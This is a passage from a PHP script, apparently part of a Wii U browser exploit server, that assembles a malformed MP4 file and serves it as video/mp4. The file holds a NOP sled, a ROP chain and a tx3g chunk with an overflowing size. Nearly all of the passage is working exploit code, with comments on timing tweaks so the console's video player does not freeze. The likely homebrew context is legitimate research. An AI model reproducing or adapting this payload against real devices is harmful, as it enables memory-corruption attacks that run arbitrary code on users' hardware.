= 0x6000) { header("HTTP/1.1 500 Internal Server Error"); die("The payload binary is too large.\n"); } while($i+4 < 0x5000) { $con.= pack("N*", 0x90909090); $i+= 4; } continue; } else { $writeval = 0x58585858; } } else if($i<$tx3g_ropchain_start) { $writeval = $ROP_POPJUMPLR_STACK12; } else if($i==$tx3g_ropchain_start) { $con.= pack("N*", $ROP_POPJUMPLR_STACK12); $con.= pack("N*", 0x48484848);//If LR ever gets loaded from here there's no known way to recover from that automatically, this code would need manually adjusted if that ever happens. Hopefully this doesn't ever happen. $i+= 0x8; $con.= $ROPCHAIN; $i+= strlen($ROPCHAIN)-4; if($i+4 > $first_tx3g_size-8) { header("HTTP/1.1 500 Internal Server Error"); $pos = ($i+4) - ($first_tx3g_size-8); die("The generated ROP-chain is $pos bytes too large.\n"); } continue; } else { $writeval = 0x48484848; } $con.= pack("N*", $writeval); } $con.= pack("N*", 0x1c5);//Setup the mdia chunk. $con.= pack("N*", 0x6d646961); $con.= pack("N*", 0x1);//Setup the second tx3g chunk: size+chunkid, followed by the actual chunk size in u64 form. $con.= pack("N*", 0x74783367); $con.= pack("N*", 0x1); $con.= pack("N*", 0x100000000-$first_tx3g_size);//Haxx buffer alloc size passed to the memalloc code is 0x100000000. for($i=0; $i<0x2000; $i+=4)//Old stuff, probably should be removed(testing is required for that). { $con.= pack("N*", 0x8495a6b4); } header('HTTP/1.0 200 OK'); header("Content-Type: video/mp4"); header('Accept-Ranges: bytes'); header('Content-Length: '.strlen($con)); header("Content-Transfer-Encoding: binary\n"); header('Connection: close'); // thanks to http://loadiine.ovh for finding this out // At this exact moment, WiiU is loading its video player according to "Content-Type: video/mp4" // When loaded too quickly, the video player can still freeze. 
// So give the video player one second to come up before any body bytes are sent.
sleep(1);

// Stream the response body ($con, assembled earlier in this script) in 16 KiB
// slices, pausing 1 ms after each slice, until nothing is left. The do/while
// form means one (possibly empty) slice is always written, even for an empty body.
$sliceSize = 1024*16;
do {
    // Emit the leading slice, then keep only the unsent remainder in $con.
    echo substr($con, 0, $sliceSize);
    $con = substr($con, $sliceSize);
    usleep(1000);
} while (strlen($con) > 0);
?>